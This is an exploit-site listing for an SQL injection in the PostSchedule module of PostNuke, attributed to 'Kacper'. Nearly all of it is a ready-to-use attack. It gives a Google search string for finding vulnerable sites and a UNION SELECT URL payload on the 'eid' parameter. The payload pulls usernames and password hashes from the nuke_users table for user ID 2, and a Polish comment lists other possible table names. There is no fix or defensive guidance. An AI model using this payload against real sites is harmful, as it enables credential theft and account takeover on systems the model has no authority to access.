PostNuke Module PostSchedule (eid) SQL Injection Vulnerability

🗓️ 25 Apr 2008 00:00:00Reported by KacperType

zdt🔗 0day.today👁 23 Views

PostNuke Module PostSchedule SQL Injection Vulnerabilit

==============================================================
PostNuke Module PostSchedule (eid) SQL Injection Vulnerability
==============================================================



Vuln: Postnuke Mod PostSchedule SQL Vuln
Author: Vuln search Kacper 
google:"PostSchedule ver 1"

Vuln:

index.php?module=PostSchedule&view=event&eid=-1')+union+select+0,1,2,3,4,5,6,7,8,concat(pn_uname,char(58),pn_pass),10,11,12,13/**/from/**/nuke_users/**/where/**/pn_uid=2/*

$Severo:
Moga byc rozne tabele np. pn_users, nuke_users itp.



#  0day.today [2018-01-10]  #

25 Apr 2008 00:00Current

7.1High risk

Vulners AI Score7.1